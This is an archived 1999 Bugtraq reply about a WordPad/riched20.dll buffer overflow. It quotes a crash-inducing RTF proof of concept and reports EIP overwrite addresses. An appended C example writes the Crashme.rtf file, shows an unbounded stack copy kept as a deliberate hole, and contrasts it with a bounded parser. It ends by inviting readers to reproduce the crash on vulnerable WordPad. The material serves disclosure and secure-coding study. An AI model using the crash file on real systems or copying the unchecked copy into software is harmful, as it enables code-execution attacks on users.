[12661] in bugtraq
Re: WordPad/riched20.dll buffer overflow
daemon@ATHENA.MIT.EDU (Bronek Kozicki)
Fri Nov 19 18:04:33 1999
Message-Id: <000a01bf31fe$d6829700$fac9a8c0@poland.wpi>
Date: Thu, 18 Nov 1999 20:55:18 +0100
Reply-To: Bronek Kozicki <bronek@WPI.COM.PL>
From: Bronek Kozicki <bronek@WPI.COM.PL>
X-To: BugTraq Mailing List <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991118094304.1519.qmail@hotmail.com>
> Just if someone needs to know...
>
> Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
> overflow problem with ".rtf"-files.
>
> Crashme.rtf :
> {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
>
> A malicious document may probably abuse this to execute arbitrary
> code. WordPad crashes with EIP=41414141.
My WordPad crashed with the message:
The instruction at "0x61616161" referenced memory at "0x61616161". The
memory could not be "read".
I press "OK" to close the application, and the next message is:
The instruction at "0x5f8012b3" referenced memory at "0x00000004". The
memory could not be "read".
Then my only "choice" is to "terminate the application".
I use Windows NT (international English edition) + SP5.
Bronek Kozicki
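The crash pattern both posts describe (a long run of letters after a backslash landing in EIP: 0x41 is 'A', 0x61 is 'a') is the signature of a control-word copy into a fixed-size stack buffer. The following is an added example, written for this archive page and not code from either poster or from riched20.dll: it builds the Crashme.rtf file with a chosen fill byte and length, shows the unchecked copy in the shape that produces that crash, and beside it a bounded reader that rejects overlong control words. The buffer size CW_MAX, the function names and the parser structure are assumptions for illustration; the real riched20.dll internals are not given on this page.

```c
/* Added example (not from the original posts, not riched20.dll code):
 * a generator for the Crashme.rtf test file, the vulnerable control-word
 * copy in the shape the report implies, and a bounded replacement.
 * CW_MAX and the parser layout are assumptions for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CW_MAX 32  /* assumed fixed-size control-word buffer */

/* Build "{\rtf\" + n copies of `fill` + "}" into `out`.
 * Returns the byte length written (without NUL), or -1 if `out` is too small. */
int build_crashme(char *out, size_t outsz, char fill, size_t n) {
    size_t need = 6 + n + 1;            /* "{\rtf\" (6) + letters + "}" */
    if (outsz < need + 1) return -1;
    memcpy(out, "{\\rtf\\", 6);
    memset(out + 6, fill, n);
    out[6 + n] = '}';
    out[need] = '\0';
    return (int)need;
}

/* Write the test file to disk; 0 on success, -1 on error. */
int write_crashme(const char *path, char fill, size_t n) {
    char buf[256];
    int len = build_crashme(buf, sizeof buf, fill, n);
    if (len < 0) return -1;
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(buf, 1, (size_t)len, f);
    return (fclose(f) == 0 && w == (size_t)len) ? 0 : -1;
}

/* VULNERABLE shape (the bug class the report describes): letters after a
 * backslash are copied into a fixed stack buffer with no length check, so a
 * long run overwrites what follows `word` on the stack, including the saved
 * return address. That is how EIP becomes 0x41414141 with 'A' fill or
 * 0x61616161 with 'a' fill. Shown for contrast only; never called here. */
int vulnerable_read_control_word(const char *p) {
    char word[CW_MAX];
    size_t i = 0;
    while (isalpha((unsigned char)p[i])) { word[i] = p[i]; i++; }  /* no bound */
    word[i] = '\0';
    return (int)strlen(word);
}

/* Hardened form: refuse control words that do not fit the buffer.
 * Returns the word length (0 if no letters follow), or -1 if overlong. */
int read_control_word(const char *p, char *word /* CW_MAX bytes */) {
    size_t i = 0;
    while (isalpha((unsigned char)p[i])) {
        if (i >= CW_MAX - 1) { word[0] = '\0'; return -1; }
        word[i] = p[i];
        i++;
    }
    word[i] = '\0';
    return (int)i;
}

/* Walk an RTF document: return the number of control words, or -1 as soon
 * as an overlong one is seen. Escaped literals (\\ \{ \}) are skipped. */
int scan_rtf(const char *doc) {
    int count = 0;
    char word[CW_MAX];
    for (const char *p = doc; *p; p++) {
        if (*p != '\\') continue;
        if (p[1] == '\\' || p[1] == '{' || p[1] == '}') { p++; continue; }
        int n = read_control_word(p + 1, word);
        if (n < 0) return -1;
        if (n > 0) count++;
        p += n;                          /* letters already consumed */
    }
    return count;
}

/* Convenience: build a Crashme-style document in memory and scan it. */
int scan_crashme(char fill, size_t n) {
    char doc[256];
    if (build_crashme(doc, sizeof doc, fill, n) < 0) return -1;
    return scan_rtf(doc);
}

int main(void) {
    printf("hardened scan of Crashme.rtf (48 x 'A'): %d (rejected = -1)\n",
           scan_crashme('A', 48));
    printf("hardened scan of a benign document: %d control words\n",
           scan_rtf("{\\rtf1\\ansi\\par Hello}"));
    return write_crashme("Crashme.rtf", 'A', 48) == 0 ? 0 : 1;
}
```

Vary the fill byte and length in `main` to reproduce either reporter's EIP value when loading the written file in a vulnerable WordPad; the bounded reader returns -1 for the same input instead of copying past the buffer.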